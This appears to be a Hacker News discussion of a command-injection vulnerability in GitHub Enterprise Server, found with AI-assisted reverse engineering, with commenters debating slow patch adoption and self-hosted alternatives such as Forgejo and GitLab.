They hint at their AI-augmented reversing methodology, which demonstrates one of the core strengths of current LLM agents. These models, trained extensively on code, can immensely speed up the process of understanding complex system internals.
Security research historically has two difficult components that build on one another:
1. Understanding complex system internals: uncovering the inner workings hidden by abstractions or interfaces
2. Finding vulnerabilities in these uncovered mechanisms
Sometimes both steps are equally hard. But often, finding the vulnerability is trivial once the real mechanisms are uncovered, rather than relying on assumptions about inner workings.
CVE-2026-3854 is a case where the vulnerability is not plainly obvious after understanding the internals. Still, I am confident that this command injection would have been found quickly had it been exposed to a more traditional or accessible attack surface.
Anyone in here work at Wiz? Seem like they do pretty good work. Tool itself has survived extreme growth/feature bloat and still does pretty well. Security team has found some really cool stuff.
> GitHub Enterprise Server customers should upgrade immediately - at the time of this writing, our data indicates that 88% of instances are still vulnerable
Question is how fragile the upgrade process is in large installations. In other enterprise software messing around with large amounts of data I've seen the smallest things break the install and leaving the OPs team rolling back. Was like SharePoint in the past, you were rolling a dice when upgrading it.
The GitHub blog had an article saying that all patches must pass for github.com before merge but the GitHub Enterprise tests have a three day window to be rectified.
If you're in the enterprise you can update something outside of the normal schedule and guarantee blow up everything (and be blamed) or you can stick with the schedule and hope for the best.
I assume a fair amount of these on-prem customers restrict access to their GHES instance to be behind corporate VPN or something similar and are planning a date to upgrade their instance that won't affect operations.
Any public instance should update immediately though, it's not very hard to put together how to repro the vulnerability on your own from what they provide in the article and the fact that GitHub Enterprise source is publicly available.
GHES is essentially unmaintained (perhaps “on life support” would be more charitable since they are certainly accepting payment for it) and has been so for about a decade. It requires a multi-hour downtime to apply even a patch-level release. They do not have any supported mechanism for HA upgrades. So even the most conscientious GHES customers lag the latest version because they can’t afford the downtime.
They are constantly telling all their GHES customers who complain about the severe flaws with the self-hosted appliance product to move to GitHub Enterprise Cloud, which is just regular GitHub.com, but who in their right mind would make that move nowadays??? At least GHES stays up during the daily github.com outages.
Until GHES can do zero-downtime upgrades nothing will get better. Not on their roadmap because as far as I’m aware the GHES team doesn’t actually exist or is entirely focused on KLTO. It’s a dead product that they wish didn’t exist.
It sure isn’t! GitHub Enterprise Cloud is simply an enterprise plan on the regular multitenant github.com. Your repositories are on disk right next to everyone else that uses github.com. There is no segregated storage or compute.
I wish they had a plan to literally host GHES for you because then more people in the company would be forced to reckon with how terrible GHES is from an operational perspective. It is stuck ca. 15-20 years ago conceptually.
If you could only choose from github, gitlab and atlassan then I suppose.. But really anything newer that stays in existance has to be focused on quality from early enough to not be defined by path dependence problems and bad choices like those 3.
I am personally now drawing a clear delineation between projects for my internal consumption (e.g. ansible scripts) and projects that have potential use for the general populace. For the prior, I now host a private Forgejo instance. For the latter, I'll put it on GitHub but mirror it to my Forgejo instance.
I was pleasantly shocked that Forgejo is literally a single binary with a relatively easy config. All my internal services reference my Forgejo instance so, if I need to bail on GitHub, it's low friction for me.
A "reasonable" answer is probably a primary self-hosted Forgejo instance as the canonical forge, while using GitHub as a mirror solely to take advantage of its free CI, while that lasts, while hosting secrets with a dedicated secret-hosting provider (I don't know what the provider du jour for this is these days).
If the primary forge's only job is to host the actual Git infrastructure (the code, the MRs, the issues, maybe a wiki), it's a lot more simple than GitHub, and probably more within the scope of what people can reasonably administer themselves.
I hosted the first "java.apache.org". I was an early employee at CollabNet, and in the first discussions around starting subversion. I worked on Cloud Foundry.
This stuff isn't easy and I'm more than happy letting someone else do it at the expense of some downtime.
> solely to take advantage of its free CI, while that lasts
Eh, if you want to be able to continue working, deploy and what not as normal during weekdays, I'd suggest also moving to Forgejo Actions if you're moving anyways. Not 100% compatible, but more or less the same, and even paying the same but with dedicated hardware you'd get way faster runners.
For companies with resources for infrastructure, sure.
For OSS, the unlimited free minutes of multiplatform CI offered by GitHub are literally impossible to replace. Maintaining runners yourself to do the same things would be somewhere between a part- and full-time job.
"Codeberg is a non-profit, community-led effort that provides services to free and open-source projects, such as Git hosting (using Forgejo), Pages, CI/CD and a Weblate instance."
Never say impossible.
Github is still "new" to a lot of us. OSS existed well before it, and will continue to exist well after.
The all-in-docker image and a couple of gitlab runners is all small to medium sized teams need. (Don't overcomplicate it with the kubernetes version unless you really need it)
We moved from github to a self-hosted forgejo instance about 6 months ago, works like a charm. Still can't belive how snappy forgejo is / laggy github has become
I was impressed enough by AI finding vulnerabilities in source code, but doing it in binary executables is just amazing. This has so much potential, good and bad.
And yet another lesson to not treat data as instructions. Sanitize all user input!
Transformers were literally designed for translation.
As we have known for a while, they ended up being really good at translating source to source or text to source. It shouldn't be too surprising they are also really good at understanding the asm version too.
Doesn't make it any less impressive, but maybe less surprising.
My read is that this vulnerability is exploitable by an anonymous user. They absolutely have HTTP/gitprotocol logs that would indicate whether this was exploited but if it was, they won’t have logging about what actually got accessed and who did it, since the exploit was capable of standalone execution on the git servers, which would by definition be capable of evading any logging.
It's good to add information about what the vulnerability actually was, but please don't do it in the key of putdown. We're trying for something else here.
They hint at their AI-augmented reversing methodology, which demonstrates one of the core strengths of current LLM agents. These models, trained extensively on code, can immensely speed up the process of understanding complex system internals.
Security research historically has two difficult components that build on one another: 1. Understanding complex system internals: uncovering the inner workings hidden by abstractions or interfaces 2. Finding vulnerabilities in these uncovered mechanisms
Sometimes both steps are equally hard. But often, finding the vulnerability is trivial once the real mechanisms are uncovered, rather than relying on assumptions about inner workings.
CVE-2026-3854 is a case where the vulnerability is not plainly obvious after understanding the internals. Still, I am confident that this command injection would have been found quickly had it been exposed to a more traditional or accessible attack surface.
Anyone in here work at Wiz? Seem like they do pretty good work. Tool itself has survived extreme growth/feature bloat and still does pretty well. Security team has found some really cool stuff.
> April 28, 2026
> GitHub Enterprise Server customers should upgrade immediately - at the time of this writing, our data indicates that 88% of instances are still vulnerable
> Upgrade to GHES version 3.19.3 or later
https://docs.github.com/en/enterprise-server@3.19/admin/rele... :
> Enterprise Server 3.19.3 - March 10, 2026
88% of on-prem customers haven't applied a critical security fix from 7 weeks ago, that seems ... bad.
Question is how fragile the upgrade process is in large installations. In other enterprise software messing around with large amounts of data I've seen the smallest things break the install and leaving the OPs team rolling back. Was like SharePoint in the past, you were rolling a dice when upgrading it.
It's incredibly fragile. It breaks a vast majority of the time and takes multiple rounds of support on-call to upgrade typically.
Unsurprising for a fourth tier on-prem created by cutting a continuously deployed application into releases.
The GitHub blog had an article saying that all patches must pass for github.com before merge but the GitHub Enterprise tests have a three day window to be rectified.
If you're in the enterprise you can update something outside of the normal schedule and guarantee blow up everything (and be blamed) or you can stick with the schedule and hope for the best.
Guess which is usually picked ...
I assume a fair amount of these on-prem customers restrict access to their GHES instance to be behind corporate VPN or something similar and are planning a date to upgrade their instance that won't affect operations.
Any public instance should update immediately though, it's not very hard to put together how to repro the vulnerability on your own from what they provide in the article and the fact that GitHub Enterprise source is publicly available.
For sure - the last company I worked at that had GitHub Enterprise had it running on a private network only accessible within the company.
GHES is essentially unmaintained (perhaps “on life support” would be more charitable since they are certainly accepting payment for it) and has been so for about a decade. It requires a multi-hour downtime to apply even a patch-level release. They do not have any supported mechanism for HA upgrades. So even the most conscientious GHES customers lag the latest version because they can’t afford the downtime.
They are constantly telling all their GHES customers who complain about the severe flaws with the self-hosted appliance product to move to GitHub Enterprise Cloud, which is just regular GitHub.com, but who in their right mind would make that move nowadays??? At least GHES stays up during the daily github.com outages.
You can at least schedule the updates.
It's still a pretty annoying process, though.
Until GHES can do zero-downtime upgrades nothing will get better. Not on their roadmap because as far as I’m aware the GHES team doesn’t actually exist or is entirely focused on KLTO. It’s a dead product that they wish didn’t exist.
Pretty sure GitHub Enterprise Cloud is just Github hosting their enterprise server for you on Azure so you don't have to do the patching yourself.
Github enterprise cloud is on github.com and with more features: http://github.com/account/enterprises/new
They don't host github enterprise server for you (though gitlab has something called gitlab dedicated which they host gitlab ee for you).
Why is there an eu github status then ? https://eu.githubstatus.com/uptime
Data residency is a thing.
It sure isn’t! GitHub Enterprise Cloud is simply an enterprise plan on the regular multitenant github.com. Your repositories are on disk right next to everyone else that uses github.com. There is no segregated storage or compute.
I wish they had a plan to literally host GHES for you because then more people in the company would be forced to reckon with how terrible GHES is from an operational perspective. It is stuck ca. 15-20 years ago conceptually.
People keep wanting to replace GitHub, but with what?
If GH is getting RCE's this late in the game who wants to take the chance something else won't?
GitLab ?
The people who suggest gitlab, haven't used it. But I guess I could be tempted to try again...
https://status.gitlab.com/pages/history/5b36dc6502d06804c083...
If you could only choose from github, gitlab and atlassan then I suppose.. But really anything newer that stays in existance has to be focused on quality from early enough to not be defined by path dependence problems and bad choices like those 3.
Given that github is imploding under a lot of load, everyone leaving github for something else, actually makes github better.
Ah, you assumed I meant SaaS GitLab. I meant the self-hosted version. I would never host our source code on a remote service.
Why not?
.... git?
replace it with git.
if you want a whole ui you can use something like forgejo which has far fewer features likely leading to less issues.
i want what github offers.
Enjoy your experience, there will certainly be no end to it.
I've had my account since 2008. ¯\_(ツ)_/¯
updated: changed the date to 2008.
my account shows 2001, but that's probably from projects I moved over... proof: https://github.com/lookfirst
GitHub launched in 2008, so that seems unlikely?
Just be careful your patronage doesn't lead to a sunk cost fallacy---a middle manager might just be betting on it
I have no ingrained loyalty, I just haven't found something better.
i just deleted my account of 2008. github sucks
You probably meant Forgejo. Codeberg is a Forgejo instance exclusive for FOSS projects.
I am personally now drawing a clear delineation between projects for my internal consumption (e.g. ansible scripts) and projects that have potential use for the general populace. For the prior, I now host a private Forgejo instance. For the latter, I'll put it on GitHub but mirror it to my Forgejo instance.
I was pleasantly shocked that Forgejo is literally a single binary with a relatively easy config. All my internal services reference my Forgejo instance so, if I need to bail on GitHub, it's low friction for me.
A "reasonable" answer is probably a primary self-hosted Forgejo instance as the canonical forge, while using GitHub as a mirror solely to take advantage of its free CI, while that lasts, while hosting secrets with a dedicated secret-hosting provider (I don't know what the provider du jour for this is these days).
Replace a whole 24/7 team of devops people with myself?
As much as I'd like to believe that I'm worthy, I'm not.
If the primary forge's only job is to host the actual Git infrastructure (the code, the MRs, the issues, maybe a wiki), it's a lot more simple than GitHub, and probably more within the scope of what people can reasonably administer themselves.
I hosted the first "java.apache.org". I was an early employee at CollabNet, and in the first discussions around starting subversion. I worked on Cloud Foundry.
This stuff isn't easy and I'm more than happy letting someone else do it at the expense of some downtime.
24/7 devops team for a forgejo instance? Come on mate...
24/7 devops team for github? Come on mate...
Is running a small forgejo instance for a team the same as running GitHub?
> solely to take advantage of its free CI, while that lasts
Eh, if you want to be able to continue working, deploy and what not as normal during weekdays, I'd suggest also moving to Forgejo Actions if you're moving anyways. Not 100% compatible, but more or less the same, and even paying the same but with dedicated hardware you'd get way faster runners.
For companies with resources for infrastructure, sure.
For OSS, the unlimited free minutes of multiplatform CI offered by GitHub are literally impossible to replace. Maintaining runners yourself to do the same things would be somewhere between a part- and full-time job.
> For OSS, the unlimited free minutes of multiplatform CI offered by GitHub are literally impossible to replace.
Yeah, how you think the ecosystem got by before GitHub even had actions? Y'all don't remember Travis CI et al anymore?
There are more CI services than what Microsoft offers the world, sometimes it's worth looking around a bit.
> https://docs.codeberg.org/ci/
"Codeberg is a non-profit, community-led effort that provides services to free and open-source projects, such as Git hosting (using Forgejo), Pages, CI/CD and a Weblate instance."
Never say impossible.
Github is still "new" to a lot of us. OSS existed well before it, and will continue to exist well after.
just git
Self hosted gitlab behind a VPN.
The all-in-docker image and a couple of gitlab runners is all small to medium sized teams need. (Don't overcomplicate it with the kubernetes version unless you really need it)
We moved from github to a self-hosted forgejo instance about 6 months ago, works like a charm. Still can't belive how snappy forgejo is / laggy github has become
Is it public or locked down?
https://news.ycombinator.com/item?id=47941590
Another tour de force from Wiz, and a watershed moment in AI tooling enabling RE and compromise discovery.
It throws a wrench into the argument of not publishing your source because AI will more easily compromise the code.
Another data point against doing security through obscurity.
I was impressed enough by AI finding vulnerabilities in source code, but doing it in binary executables is just amazing. This has so much potential, good and bad.
And yet another lesson to not treat data as instructions. Sanitize all user input!
Transformers were literally designed for translation.
As we have known for a while, they ended up being really good at translating source to source or text to source. It shouldn't be too surprising they are also really good at understanding the asm version too.
Doesn't make it any less impressive, but maybe less surprising.
Woah I wonder if they can tell if this has been exploited or not
My read is that this vulnerability is exploitable by an anonymous user. They absolutely have HTTP/gitprotocol logs that would indicate whether this was exploited but if it was, they won’t have logging about what actually got accessed and who did it, since the exploit was capable of standalone execution on the git servers, which would by definition be capable of evading any logging.
This is just such an amateur hour vulnerability. Gluing strings together with no regard to what might be in them and then parsing them later...
edit: I didn't mean it as a put-down of either the article or how they found the vulnerability, but it wasn't a constructive comment either way.
It's good to add information about what the vulnerability actually was, but please don't do it in the key of putdown. We're trying for something else here.
https://news.ycombinator.com/newsguidelines.html
GitHub case will be thought in schools how to screw up almost monopolistic position in the market in couple years. This is beyond bonkers.
Only if they take Skype off the syllabus first.
private equity: hold my beer!